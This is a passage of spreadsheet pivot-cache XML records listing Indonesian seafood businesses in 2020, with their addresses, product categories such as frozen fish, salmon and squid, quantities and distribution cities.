    <m/>
  </r>
  <r>
    <n v="19978"/>
    <x v="231"/>
    <s v="PT, WEST IRIAN FISHING INDUSTRIES"/>
    <s v="Jl, Udang No,6 Klademak I, Kel, Klaligi, Kec, Sorong Manoi, Kota Sorong&lt;br&gt;Papua Barat"/>
    <n v="33"/>
    <s v="Ikan Demersal Beku (Biji Nangka, Kerapu, Bawal, Kakap, Kurisi)"/>
    <d v="2020-06-08T00:00:00"/>
    <n v="81195.7"/>
    <s v="Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Surabaya, Kota Jayapura"/>
    <m/>
  </r>
  <r>
    <n v="16847"/>
    <x v="385"/>
    <s v="CV. INDOPERTAMA"/>
    <s v="Dusun Kunti RT 001 RW 004, Kel. Mranggen, Kec. Purwoasri, Kabupaten Kediri&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Produk Perikanan Bernilai Tambah Beku (Springroll Seafood, Roll Udang, Siomay Udang, Martabak Udang, Lumpia Seafood, Lumpia Udang, Otak-Otak Ikan, Wonton, Samosa)"/>
    <d v="2020-04-17T00:00:00"/>
    <n v="5000"/>
    <s v="Kota Yogyakarta, Kabupaten Malang, Kota Malang, Kota Surabaya, Kota Denpasar, Kota Banjarmasin, Kota Makassar"/>
    <m/>
  </r>
  <r>
    <n v="20683"/>
    <x v="386"/>
    <s v="UD. SBY CORPORATION"/>
    <s v="Jl. Hayam Wuruk No. 1 RT 03 RW 05, Kel. Sukodadi, Kec. Sukodadi, Kabupaten Lamongan&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Produk Perikanan Bernilai Tambah Beku (Bakso Ikan, Naget Ikan, Sosis Ikan, Kaki Naga) "/>
    <d v="2020-09-10T00:00:00"/>
    <n v="12000"/>
    <s v="Kabupaten Sidoarjo, Kabupaten Tuban, Kabupaten Lamongan, Kabupaten Gresik, Kota Pasuruan, Kota Surabaya"/>
    <m/>
  </r>
  <r>
    <n v="19428"/>
    <x v="368"/>
    <s v="CV. GEMA ANDIKA PRATAMA"/>
    <s v="Pergudangan 88, Jl. Pesing Poglar No.76A RT 004 RW 002, Kel. Kedaung Kaliangke, Kec. Cengkareng, Kota Jakarta Barat&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Ikan Pelagis Beku (Tongkol, Kembung, Selar, Layang, Salem)"/>
    <d v="2020-03-27T00:00:00"/>
    <n v="300000"/>
    <s v="Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara"/>
    <m/>
  </r>
  <r>
    <n v="19445"/>
    <x v="387"/>
    <s v="PT, MASUYA GRAHA TRIKENCANA"/>
    <s v="Jl, Cempaka No,12 Blok F-I, Kel, Jatimulya, Kec, Tambun Selatan, Kabupaten Bekasi&lt;br&gt;Jawa Barat"/>
    <n v="13"/>
    <s v="Kerang Segar"/>
    <d v="2020-04-08T00:00:00"/>
    <n v="2146.7800000000002"/>
    <s v="Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara"/>
    <m/>
  </r>
  <r>
    <n v="19878"/>
    <x v="387"/>
    <s v="PT, MASUYA GRAHA TRIKENCANA"/>
    <s v="Jl, Cempaka No,12 Blok F-I, Kel, Jatimulya, Kec, Tambun Selatan, Kabupaten Bekasi&lt;br&gt;Jawa Barat"/>
    <n v="13"/>
    <s v="Ikan Demersal Segar (Kakap, Kerapu, Layur, Malong, Kurisi, Cod, Sebelah, Gerot-gerot, Ekor Kuning)"/>
    <d v="2020-04-08T00:00:00"/>
    <n v="4813.6400000000003"/>
    <s v="Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara"/>
    <m/>
  </r>
  <r>
    <n v="19879"/>
    <x v="387"/>
    <s v="PT. MASUYA GRAHA TRIKENCANA"/>
    <s v="Jl. Cempaka No.12 Blok F-I, Kel. Jatimulya, Kec. Tambun Selatan, Kabupaten Bekasi&lt;br&gt;Jawa Barat"/>
    <n v="13"/>
    <s v="Ikan Demersal Beku (Kakap, Kerapu, Layur, Malong, Kurisi, Cod, Sebelah, Gerot-gerot, Ekor Kuning)"/>
    <d v="2020-04-08T00:00:00"/>
    <n v="5231"/>
    <s v="Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara"/>
    <m/>
  </r>
  <r>
    <n v="19880"/>
    <x v="387"/>
    <s v="PT, MASUYA GRAHA TRIKENCANA"/>
    <s v="Jl, Cempaka No,12 Blok F-I, Kel, Jatimulya, Kec, Tambun Selatan, Kabupaten Bekasi&lt;br&gt;Jawa Barat"/>
    <n v="13"/>
    <s v="Ikan Pelagis Segar (Cakalang, Amberjack, Alaska Pollack, Japanese Butter Fish, Pacific Saury, Gizzard Shad, Barakuda, Makerel, Monkfish, Gindara, Sarden, Salem)"/>
    <d v="2020-04-08T00:00:00"/>
    <n v="2554.75"/>
    <s v="Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara"/>
    <m/>
  </r>
  <r>
    <n v="19881"/>
    <x v="387"/>
    <s v="PT. MASUYA GRAHA TRIKENCANA"/>
    <s v="Jl. Cempaka No.12 Blok F-I, Kel. Jatimulya, Kec. Tambun Selatan, Kabupaten Bekasi&lt;br&gt;Jawa Barat"/>
    <n v="13"/>
    <s v="Ikan Pelagis Beku (Cakalang, Amberjack, Alaska Pollack, Japanese Butter Fish, Pacific Saury, Gizzard Shad, Barakuda, Makerel, Monkfish, Gindara, Sarden, Salem)"/>
    <d v="2020-04-08T00:00:00"/>
    <n v="1200"/>
    <s v="Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara"/>
    <m/>
  </r>
  <r>
    <n v="19882"/>
    <x v="387"/>
    <s v="PT. MASUYA GRAHA TRIKENCANA"/>
    <s v="Jl. Cempaka No.12 Blok F-I, Kel. Jatimulya, Kec. Tambun Selatan, Kabupaten Bekasi&lt;br&gt;Jawa Barat"/>
    <n v="13"/>
    <s v="Kerang Beku"/>
    <d v="2020-04-08T00:00:00"/>
    <n v="1200"/>
    <s v="Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara"/>
    <m/>
  </r>
  <r>
    <n v="19884"/>
    <x v="387"/>
    <s v="PT. MASUYA GRAHA TRIKENCANA"/>
    <s v="Jl. Cempaka No.12 Blok F-I, Kel. Jatimulya, Kec. Tambun Selatan, Kabupaten Bekasi&lt;br&gt;Jawa Barat"/>
    <n v="13"/>
    <s v="Fillet Salmon Segar"/>
    <d v="2020-04-08T00:00:00"/>
    <n v="2200"/>
    <s v="Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara"/>
    <m/>
  </r>
  <r>
    <n v="19885"/>
    <x v="387"/>
    <s v="PT. MASUYA GRAHA TRIKENCANA"/>
    <s v="Jl. Cempaka No.12 Blok F-I, Kel. Jatimulya, Kec. Tambun Selatan, Kabupaten Bekasi&lt;br&gt;Jawa Barat"/>
    <n v="13"/>
    <s v="Cephalopoda Segar (Gurita, Cumi-cumi)"/>
    <d v="2020-04-08T00:00:00"/>
    <n v="58"/>
    <s v="Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara"/>
    <m/>
  </r>
  <r>
    <n v="19886"/>
    <x v="387"/>
    <s v="PT. MASUYA GRAHA TRIKENCANA"/>
    <s v="Jl. Cempaka No.12 Blok F-I, Kel. Jatimulya, Kec. Tambun Selatan, Kabupaten Bekasi&lt;br&gt;Jawa Barat"/>
    <n v="13"/>
    <s v="Cephalopoda Beku (Gurita, Cumi-cumi)"/>
    <d v="2020-04-08T00:00:00"/>
    <n v="175"/>
    <s v="Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara"/>
    <m/>
  </r>
  <r>
    <n v="19887"/>
    <x v="387"/>
    <s v="PT, MASUYA GRAHA TRIKENCANA"/>
    <s v="Jl, Cempaka No,12 Blok F-I, Kel, Jatimulya, Kec, Tambun Selatan, Kabupaten Bekasi&lt;br&gt;Jawa Barat"/>
    <n v="13"/>
    <s v="Telur Ikan Segar, Hati Ikan Segar"/>
    <d v="2020-04-08T00:00:00"/>
    <s v="27/01/1900  20,38,00"/>
    <s v="Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara"/>
    <m/>
  </r>
  <r>
    <n v="19888"/>
    <x v="387"/>
    <s v="PT, MASUYA GRAHA TRIKENCANA"/>
    <s v="Jl, Cempaka No,12 Blok F-I, Kel, Jatimulya, Kec, Tambun Selatan, Kabupaten Bekasi&lt;br&gt;Jawa Barat"/>
    <n v="13"/>
    <s v="Telur Ikan Beku, Hati Ikan Baku"/>
    <d v="2020-04-08T00:00:00"/>
    <s v="19/02/1901  03,05,00"/>
    <s v="Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara"/>
    <m/>
  </r>
  <r>
    <n v="19889"/>
    <x v="387"/>
    <s v="PT, MASUYA GRAHA TRIKENCANA"/>
    <s v="Jl, Cempaka No,12 Blok F-I, Kel, Jatimulya, Kec, Tambun Selatan, Kabupaten Bekasi&lt;br&gt;Jawa Barat"/>
    <n v="13"/>
    <s v="Nori"/>
    <d v="2020-04-08T00:00:00"/>
    <s v="01/01/1900  07,11,00"/>
    <s v="Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara"/>
    <m/>
  </r>
  <r>
    <n v="19890"/>
    <x v="387"/>
    <s v="PT, MASUYA GRAHA TRIKENCANA"/>
    <s v="Jl, Cempaka No,12 Blok F-I, Kel, Jatimulya, Kec, Tambun Selatan, Kabupaten Bekasi&lt;br&gt;Jawa Barat"/>
    <n v="13"/>
    <s v="Tuna Segar"/>
    <d v="2020-04-08T00:00:00"/>
    <n v="866.96"/>
    <s v="Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara"/>
    <m/>
  </r>
  <r>
    <n v="19891"/>
    <x v="387"/>
    <s v="PT, MASUYA GRAHA TRIKENCANA"/>
    <s v="Jl, Cempaka No,12 Blok F-I, Kel, Jatimulya, Kec, Tambun Selatan, Kabupaten Bekasi&lt;br&gt;Jawa Barat"/>
    <n v="13"/>
    <s v="Tuna Beku"/>
    <d v="2020-04-08T00:00:00"/>
    <s v="13/02/1900  01,07,00"/>
    <s v="Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara"/>
    <m/>
  </r>
  <r>
    <n v="19892"/>
    <x v="387"/>
    <s v="PT, MASUYA GRAHA TRIKENCANA"/>
    <s v="Jl, Cempaka No,12 Blok F-I, Kel, Jatimulya, Kec, Tambun Selatan, Kabupaten Bekasi&lt;br&gt;Jawa Barat"/>
    <n v="13"/>
    <s v="Udang Segar, Kepiting Segar"/>
    <d v="2020-04-08T00:00:00"/>
    <s v="19/02/1900  05,07,00"/>
    <s v="Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara"/>
    <m/>
  </r>
  <r>
    <n v="19893"/>
    <x v="387"/>
    <s v="PT. MASUYA GRAHA TRIKENCANA"/>
    <s v="Jl. Cempaka No.12 Blok F-I, Kel. Jatimulya, Kec. Tambun Selatan, Kabupaten Bekasi&lt;br&gt;Jawa Barat"/>
    <n v="13"/>
    <s v="Udang Beku, Kepiting Beku,"/>
    <d v="2020-04-08T00:00:00"/>
    <n v="2200"/>
    <s v="Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara"/>
    <m/>
  </r>
  <r>
    <n v="19894"/>
    <x v="387"/>
    <s v="PT. MASUYA GRAHA TRIKENCANA"/>
    <s v="Jl. Cempaka No.12 Blok F-I, Kel. Jatimulya, Kec. Tambun Selatan, Kabupaten Bekasi&lt;br&gt;Jawa Barat"/>
    <n v="13"/>
    <s v="Salmon Segar, Trout Segar"/>
    <d v="2020-04-08T00:00:00"/>
    <n v="197735"/>
    <s v="Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara"/>
    <m/>
  </r>
  <r>
    <n v="19895"/>
    <x v="387"/>
    <s v="PT. MASUYA GRAHA TRIKENCANA"/>
    <s v="Jl. Cempaka No.12 Blok F-I, Kel. Jatimulya, Kec. Tambun Selatan, Kabupaten Bekasi&lt;br&gt;Jawa Barat"/>
    <n v="13"/>
    <s v="Salmon Beku, Trout Beku"/>
    <d v="2020-04-08T00:00:00"/>
    <n v="197735"/>
    <s v="Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara"/>
    <m/>
  </r>
  <r>
    <n v="19896"/>
    <x v="387"/>
    <s v="PT. MASUYA GRAHA TRIKENCANA"/>
    <s v="Jl. Cempaka No.12 Blok F-I, Kel. Jatimulya, Kec. Tambun Selatan, Kabupaten Bekasi&lt;br&gt;Jawa Barat"/>
    <n v="13"/>
    <s v="Fillet Salmon Beku"/>
    <d v="2020-04-08T00:00:00"/>
    <n v="49888"/>
    <s v="Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara"/>
    <m/>
  </r>
  <r>
    <n v="20440"/>
    <x v="388"/>
    <s v="PT. SUSHI - TEI INDONESIA"/>
    <s v="Kompleks Pergudangan Tunas Bitung Blok C-3 No.09-11, Kel. Pasir Jaya, Kec. Cikupa, Kabupaten Tangerang&lt;br&gt;Banten"/>
    <n v="11"/>
    <s v="Salmon Segar, Trout Segar"/>
    <d v="2020-04-14T00:00:00"/>
    <n v="50"/>
    <s v="Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara"/>
    <m/>
  </r>
  <r>
    <n v="20604"/>
    <x v="389"/>
    <s v="PT. DKSH INDONESIA"/>
    <s v="IDS DSC MED Center Jln. Jawa Blok A1 MM2100 Industrial Estate Cibitung, Desa Mekarwangi, Kec. Cikarang Barat, Kabupaten Bekasi&lt;br&gt;Jawa Barat"/>
    <n v="13"/>
    <s v="Tepung Karagenan"/>
    <d v="2020-09-29T00:00:00"/>
    <n v="107000"/>
    <s v="Kota Jakarta Timur, Kabupaten Bekasi, Kota Bogor, Kabupaten Pati, Kota Surabaya, Kabupaten Tangerang"/>
    <m/>
  </r>
  <r>
    <n v="20740"/>
    <x v="8"/>
    <s v="PT. CENHONG FISHERINDO"/>
    <s v="Pelabuhan Perikanan Samudera Nizam Zachman Jl. Muara Baru Ujung Blok L No.3 Room 4 dan 5, Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Ikan Demersal Beku (Gulama, Katamba, Kuwe, Kerapu, Jenaha, Kakatua, Bawal, Kakap, Baronang, Kurisi, Selar Kuning, Ekor Kuning, Barramundi)"/>
    <d v="2020-06-02T00:00:00"/>
    <n v="775"/>
    <s v="Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara"/>
    <m/>
  </r>
  <r>
    <n v="20741"/>
    <x v="8"/>
    <s v="PT. CENHONG FISHERINDO"/>
    <s v="Pelabuhan Perikanan Samudera Nizam Zachman Jl. Muara Baru Ujung Blok L No.3 Room 4 dan 5, Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Tuna Beku"/>
    <d v="2020-06-02T00:00:00"/>
    <n v="75881"/>
    <s v="Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara"/>
    <m/>
  </r>
  <r>
    <n v="20856"/>
    <x v="390"/>
    <s v="PT. INDOGUNA UTAMA"/>
    <s v="Kawasan Industri Millenium Jl. Millenium 22 Blok R-5 No.3 Room C3, Kel. Kadu Agung, Kec. Tiga Raksa, Kabupaten Tangerang&lt;br&gt;Banten"/>
    <n v="11"/>
    <s v="Salmon Beku, Trout Beku"/>
    <d v="2020-08-03T00:00:00"/>
    <n v="300000"/>
    <s v="Kota Jakarta Selatan, Kota Yogyakarta, Kota Tangerang, Kota Denpasar, Kota Balikpapan, Kota Makassar"/>
    <m/>
  </r>
  <r>
    <n v="20857"/>
    <x v="390"/>
    <s v="PT. INDOGUNA UTAMA"/>
    <s v="Kawasan Industri Millenium Jl. Millenium 22 Blok R-5 No.3 Room C3, Kel. Kadu Agung, Kec. Tiga Raksa, Kabupaten Tangerang&lt;br&gt;Banten"/>
    <n v="11"/>
    <s v="Salmon Segar, Trout Segar"/>
    <d v="2020-08-03T00:00:00"/>
    <n v="450000"/>
    <s v="Kota Jakarta Selatan, Kota Yogyakarta, Kota Tangerang, Kota Denpasar, Kota Balikpapan, Kota Makassar"/>
    <m/>
  </r>
  <r>
    <n v="20858"/>
    <x v="390"/>
    <s v="PT. INDOGUNA UTAMA"/>
    <s v="Kawasan Industri Millenium Jl. Millenium 22 Blok R-5 No.3 Room C3, Kel. Kadu Agung, Kec. Tiga Raksa, Kabupaten Tangerang&lt;br&gt;Banten"/>
    <n v="11"/>
    <s v="Cephalopoda Beku (Cumi-cumi)"/>
    <d v="2020-08-03T00:00:00"/>
    <n v="250000"/>
    <s v="Kota Jakarta Selatan, Kota Yogyakarta, Kota Tangerang, Kota Denpasar, Kota Balikpapan, Kota Makassar"/>
    <m/>
  </r>
  <r>
    <n v="20859"/>
    <x v="390"/>
    <s v="PT. INDOGUNA UTAMA"/>
    <s v="Kawasan Industri Millenium Jl. Millenium 22 Blok R-5 No.3 Room C3, Kel. Kadu Agung, Kec. Tiga Raksa, Kabupaten Tangerang&lt;br&gt;Banten"/>
    <n v="11"/>
    <s v="Cephalopoda Segar (Cumi-cumi)"/>
    <d v="2020-08-03T00:00:00"/>
    <n v="100000"/>
    <s v="Kota Jakarta Selatan, Kota Yogyakarta, Kota Tangerang, Kota Denpasar, Kota Balikpapan, Kota Makassar"/>
    <m/>
  </r>
  <r>
    <n v="20860"/>
    <x v="390"/>
    <s v="PT. INDOGUNA UTAMA"/>
    <s v="Kawasan Industri Millenium Jl. Millenium 22 Blok R-5 No.3 Room C3, Kel. Kadu Agung, Kec. Tiga Raksa, Kabupaten Tangerang&lt;br&gt;Banten"/>
    <n v="11"/>
    <s v="Kerang Beku"/>
    <d v="2020-08-03T00:00:00"/>
    <n v="100000"/>
    <s v="Kota Jakarta Selatan, Kota Yogyakarta, Kota Tangerang, Kota Denpasar, Kota Balikpapan, Kota Makassar"/>
    <m/>
  </r>
  <r>
    <n v="20861"/>
    <x v="390"/>
    <s v="PT. INDOGUNA UTAMA"/>
    <s v="Kawasan Industri Millenium Jl. Millenium 22 Blok R-5 No.3 Room C3, Kel. Kadu Agung, Kec. Tiga Raksa, Kabupaten Tangerang&lt;br&gt;Banten"/>
    <n v="11"/>
    <s v="Kerang Segar"/>
    <d v="2020-08-03T00:00:00"/>
    <n v="50000"/>
    <s v="Kota Jakarta Selatan, Kota Yogyakarta, Kota Tangerang, Kota Denpasar, Kota Balikpapan, Kota Makassar"/>
    <m/>
  </r>
  <r>
    <n v="20862"/>
    <x v="390"/>
    <s v="PT. INDOGUNA UTAMA"/>
    <s v="Kawasan Industri Millenium Jl. Millenium 22 Blok R-5 No.3 Room C3, Kel. Kadu Agung, Kec. Tiga Raksa, Kabupaten Tangerang&lt;br&gt;Banten"/>
    <n v="11"/>
    <s v="Kepiting Beku"/>
    <d v="2020-08-03T00:00:00"/>
    <n v="100000"/>
    <s v="Kota Jakarta Selatan, Kota Yogyakarta, Kota Tangerang, Kota Denpasar, Kota Balikpapan, Kota Makassar"/>
    <m/>
  </r>
  <r>
    <n v="21253"/>
    <x v="391"/>
    <s v="PT. INDOMARU LESTARI"/>
    <s v="Jl. Peternakan II No. 40, Kel. Kapuk, Kec. Cengkareng, Kota Jakarta Barat&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Cephalopoda Beku (Gurita, Cumi-cumi)"/>
    <d v="2020-09-14T00:00:00"/>
    <n v="1500"/>
    <s v="Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara"/>
    <m/>
  </r>
  <r>
    <n v="21254"/>
    <x v="391"/>
    <s v="PT. INDOMARU LESTARI"/>
    <s v="Jl. Peternakan II No. 40, Kel. Kapuk, Kec. Cengkareng, Kota Jakarta Barat&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Salmon Beku"/>
    <d v="2020-09-14T00:00:00"/>
    <n v="9000"/>
    <s v="Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara"/>
    <m/>
  </r>
  <r>
    <n v="21256"/>
    <x v="391"/>
    <s v="PT. INDOMARU LESTARI"/>
    <s v="Jl. Peternakan II No. 40, Kel. Kapuk, Kec. Cengkareng, Kota Jakarta Barat&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Telur Ikan Beku"/>
    <d v="2020-09-14T00:00:00"/>
    <n v="2000"/>
    <s v="Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara"/>
    <m/>
  </r>
  <r>
    <n v="21257"/>
    <x v="391"/>
    <s v="PT. INDOMARU LESTARI"/>
    <s v="Jl. Peternakan II No. 40, Kel. Kapuk, Kec. Cengkareng, Kota Jakarta Barat&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Udang Beku"/>
    <d v="2020-09-14T00:00:00"/>
    <n v="200"/>
    <s v="Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara"/>
    <m/>
  </r>
  <r>
    <n v="21258"/>
    <x v="391"/>
    <s v="PT. INDOMARU LESTARI"/>
    <s v="Jl. Peternakan II No. 40, Kel. Kapuk, Kec. Cengkareng, Kota Jakarta Barat&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Kepiting Beku"/>
    <d v="2020-09-14T00:00:00"/>
    <n v="2000"/>
    <s v="Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara"/>
    <m/>
  </r>
  <r>
    <n v="21259"/>
    <x v="391"/>
    <s v="PT. INDOMARU LESTARI"/>
    <s v="Jl. Peternakan II No. 40, Kel. Kapuk, Kec. Cengkareng, Kota Jakarta Barat&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Kerang Beku"/>
    <d v="2020-09-14T00:00:00"/>
    <n v="1000"/>
    <s v="Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara"/>
    <m/>
  </r>
  <r>
    <n v="21260"/>
    <x v="391"/>
    <s v="PT. INDOMARU LESTARI"/>
    <s v="Jl. Peternakan II No. 40, Kel. Kapuk, Kec. Cengkareng, Kota Jakarta Barat&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Ikan Pelagis Beku (Hamachi, Gindara, Pacific Saury, Saba Mackerel)"/>
    <d v="2020-09-14T00:00:00"/>
    <n v="15000"/>
    <s v="Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara"/>
    <m/>
  </r>
  <r>
    <n v="21261"/>
    <x v="391"/>
    <s v="PT. INDOMARU LESTARI"/>
    <s v="Jl. Peternakan II No. 40, Kel. Kapuk, Kec. Cengkareng, Kota Jakarta Barat&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Salmon Segar"/>
    <d v="2020-09-14T00:00:00"/>
    <n v="30000"/>
    <s v="Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara"/>
    <m/>
  </r>
  <r>
    <n v="21262"/>
    <x v="391"/>
    <s v="PT. INDOMARU LESTARI"/>
    <s v="Jl. Peternakan II No. 40, Kel. Kapuk, Kec. Cengkareng, Kota Jakarta Barat&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Telur Ikan Segar"/>
    <d v="2020-09-14T00:00:00"/>
    <n v="200"/>
    <s v="Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara"/>
    <m/>
  </r>
  <r>
    <n v="21263"/>
    <x v="391"/>
    <s v="PT. INDOMARU LESTARI"/>
    <s v="Jl. Peternakan II No. 40, Kel. Kapuk, Kec. Cengkareng, Kota Jakarta Barat&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Ikan Demersal Segar (Amberjack, Hokke, Kakap Merah, Sillago)"/>
    <d v="2020-09-14T00:00:00"/>
    <n v="2500"/>
    <s v="Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara"/>
    <m/>
  </r>
  <r>
    <n v="21264"/>
    <x v="391"/>
    <s v="PT. INDOMARU LESTARI"/>
    <s v="Jl. Peternakan II No. 40, Kel. Kapuk, Kec. Cengkareng, Kota Jakarta Barat&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Udang Segar"/>
    <d v="2020-09-14T00:00:00"/>
    <n v="200"/>
    <s v="Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara"/>
    <m/>
  </r>
  <r>
    <n v="21265"/>
    <x v="391"/>
    <s v="PT. INDOMARU LESTARI"/>
    <s v="Jl. Peternakan II No. 40, Kel. Kapuk, Kec. Cengkareng, Kota Jakarta Barat&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Kepiting Segar"/>
    <d v="2020-09-14T00:00:00"/>
    <n v="200"/>
    <s v="Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara"/>
    <m/>
  </r>
  <r>
    <n v="21266"/>
    <x v="391"/>
    <s v="PT. INDOMARU LESTARI"/>
    <s v="Jl. Peternakan II No. 40, Kel. Kapuk, Kec. Cengkareng, Kota Jakarta Barat&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Cephalopoda Segar (Gurita, Cumi-cumi)"/>
    <d v="2020-09-14T00:00:00"/>
    <n v="1000"/>
    <s v="Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara"/>
    <m/>
  </r>
  <r>
    <n v="21267"/>
    <x v="391"/>
    <s v="PT. INDOMARU LESTARI"/>
    <s v="Jl. Peternakan II No. 40, Kel. Kapuk, Kec. Cengkareng, Kota Jakarta Barat&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Kerang Segar"/>
    <d v="2020-09-14T00:00:00"/>
    <n v="250"/>
    <s v="Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara"/>
    <m/>
  </r>
  <r>
    <n v="21268"/>
    <x v="391"/>
    <s v="PT. INDOMARU LESTARI"/>
    <s v="Jl. Peternakan II No. 40, Kel. Kapuk, Kec. Cengkareng, Kota Jakarta Barat&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Ikan Pelagis Segar (Hamachi, Gindara, Sauri Pasifik, Saba Mackerel)"/>
    <d v="2020-09-14T00:00:00"/>
    <n v="500"/>
    <s v="Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara"/>
    <m/>
  </r>
  <r>
    <n v="19245"/>
    <x v="382"/>
    <s v="MINA ABADHI FARM"/>
    <s v="Dusun Janten RT 06, Kel. Ngestiharjo, Kec. Kasihan, Kabupaten Bantul&lt;br&gt;Daerah Istimewa Yogyakarta"/>
    <n v="15"/>
    <s v="Crispy Ikan"/>
    <d v="2020-09-16T00:00:00"/>
    <n v="60"/>
    <s v="Kabupaten Kulon Progo, Kabupaten Bantul, Kabupaten Gunung Kidul, Kabupaten Sleman, Kota Yogyakarta"/>
    <m/>
  </r>
  <r>
    <n v="20070"/>
    <x v="392"/>
    <s v="NGUDI REJEKI"/>
    <s v="Neco Lor RT 06, Kel. Sabdodadi, Kec. Bantul, Kabupaten Bantul&lt;br&gt;Daerah Istimewa Yogyakarta"/>
    <n v="15"/>
    <s v="Bandeng Duri Lunak"/>
    <d v="2020-03-03T00:00:00"/>
    <n v="8640"/>
    <s v="Kabupaten Kulon Progo, Kabupaten Bantul, Kabupaten Gunung Kidul, Kabupaten Sleman, Kota Yogyakarta"/>
    <m/>
  </r>
  <r>
    <n v="20518"/>
    <x v="393"/>
    <s v="UD. MINA PERKASA"/>
    <s v="Kawasan PPN Prigi, Kel. Tasikmadu, Kec. Watulimo, Kabupaten Trenggalek&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
